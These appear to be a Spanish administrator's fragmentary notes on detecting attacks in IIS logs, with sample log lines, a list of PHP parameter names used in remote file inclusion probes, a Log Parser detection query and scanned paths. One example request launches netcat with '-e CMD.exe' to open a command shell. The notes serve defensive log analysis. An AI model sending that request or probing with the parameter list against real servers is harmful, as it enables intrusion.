2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp |14|800a0046|Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -
2009-11-21 13:54:40 192.168.1.36 192.168.1.34 GET /index.asp |14|800a0046|Permiso_denegado 500 Mozilla/6.0+(compatible;+MSIE+7.0a;+Windows+NT+5.2;+SV1) -

Versiones de Cadaver parcheado para acceder a fallo WebDav

Alexa recorre las págians gracias a su barra y depués de tres días

&glob
&glob[rootDir]
AIbasedir
CLPATH
CMS_ADMIN_PAGE
CONFIG[MWCHAT_Libs]
CONFIG[path]
CONFIG_EXT[LANGUAGES_DIR]
CPG_M_DIR
Cat
Config_rootdir
DIR
DIR_LIBS
FM
GALLERY_BASEDIR
GLOBALS['mosConfig_absolute_path']
GLOBALS[AA_INC_PATH]
GLOBALS[CLPath]
GLOBALS[includeBit]
GLOBALS[language_home]
GLOBALS[mosConfig_absolute_path]
GLOBALS[rootdp]
G_PATH
HCL_path
HTTP_POST_VARS
IP
Include
LOCAL_PATH
LangCookie
MAIN_PATH
ME
PATH
PATH_Includes
PGV_BASE_DIRECTORY
PHORUM[settings_dir]
REX[INCLUDE_PATH]
Server
THEME_DIR
VoteBoxPath
[Home]
_AMGconfig[cfg_serverpath]
_AMLconfig[cfg_serverpath]
_AMVconfig[cfg_serverpath]
_CCFG[_PKG_PATH_DBSE]
_PX_config[manager_path]
_REQUEST
_REQUEST[option]
_SERVER[DOCUMENT_ROOT]
a
absolute_path
act
action
addpoll
adminpath
agendax_path
alpath
apa_module_basedir
app_path
appdir
archive
arquivo
azione
b2inc
baccio
base
baseDir
base_dir
base_path
basepath
bbPath
bbPath[path]
bkpwp_plugin_path
boarddir
c
cal_dir
cfgProgDir
chem_absolu
childwindow.inc.php?form
clarolineRepositorySys
classes_dir
client
cmd
cnkey
coID
component_dir
conf
confdir
config
configFile
config[image_module]
config[include_path]
config[path_admin_include]
config[path_src_include]
config[search_disp]
config_atkroot
configbasedir
cont
content
conteudo
cropimagedir
css_path
custom
cutepath
dPconfig[root_dir]
data
dept
dir[base]
dir[func]
do
dsp
emailreader_ini
eqdkp_root_path
error
f
ff_compath
fil_config
file
file_newsportal
filnavn
fromTemplate
from_market
function
g_meta_inc_dir
g_meta_include_file
glob[rootDir]
go
gorumDir
hc
inc
inc_dir
incdir
includeFooter
includePath
include_dir
include_file
include_location
include_path
includedir
includes_dir
inhalt
kietu[url_hit]
kobr
l
lang
language_dir
layerstyle
left
lg
libpach
libpath
lm_absolute_path
lng
logfile
login
lvc_include_dir
m2f_root_path
m
mainpage
match
meio.php
meio
mode
modpath
module_path]
module_root_path
mosConfig_absolute_path
mosConfig_live_site
myPath
name
newsSync_enable_phpnuke_mod
news_file
nic
noSet
no_connect
nphp_config[LangFile]
o
opcao
open
openfile
openid_root_path
option
ort
p
pag
page
pageurl
pagina
path[docroot]
path_local
path_pre
path_to_bt_dir
path_to_news
pathtoashnews
pg
phgdir
phpAds_path
phpEx
phpbb_root_dir
phpbb_root_path
phpc_root_path
pilih
pivot_path
place
pm_path
pollname
prefix
principal
pun_root
quezza_root_path
rage
relative_script_path
rep
req_path
returnpath
root
root_dir
root_path
rootagenda
rub
s
sayfa
sbp
script_root
seccion
sel
serverPath
server_inc
setmodules
settings[locale]
settings_dir
sfx
show
side
site
site_path
siteurl
smf_root_path
sourcedir
spaw_root
sqld
systempath
t
t_core_path
template
theme_path
thisdir
thispath
tpl_pgb_moddir
url
user_inc
val1
visualizar
vsDragonRootPath
vwar_root2
vwar_root
wkPath
wpPATH
x
xcomicRootPath
xoopsConfig[xoops_url]
xoops_redirect

Consulta para sacar las variables:

logparser “SELECT * FROM ‘C:\logs\*’ where [cs-uri-query] like ‘%=http%’” -i:W3C -o:DATAGRID

http://192.168.1.33/cg/nc.exe?-L -p 82 -e CMD.exe

Entrada en el log:

GET /cg/nc.exe -L%20-p%2082%20-e%20CMD.exe

Source: http://secunia.com/advisories/19352/

Source: http://secunia.com/advisories/20395/

http://ataqueservidor.wordpress.com/2009/05/12/dfind-exe-web-0-0-0-0-v-spy-unix/

Para engañar a estos buscadores de tesoros podemos añadir una variable HTTP Headers con la palabra unix (Custom HTTP headers), de esta forma se piensan que están atacando un sistema Unix y realmente es un entorno Microsoft.

• /user/soapCaller.bs
• /roundcube/
• /webmail/
• /abc.php
• /pp/anp.php
• /thisdoesnotexistahaha.php
• /cmd.php
• /portal/cacti/cmd.php
• /portal/cmd.php
• /stats/cmd.php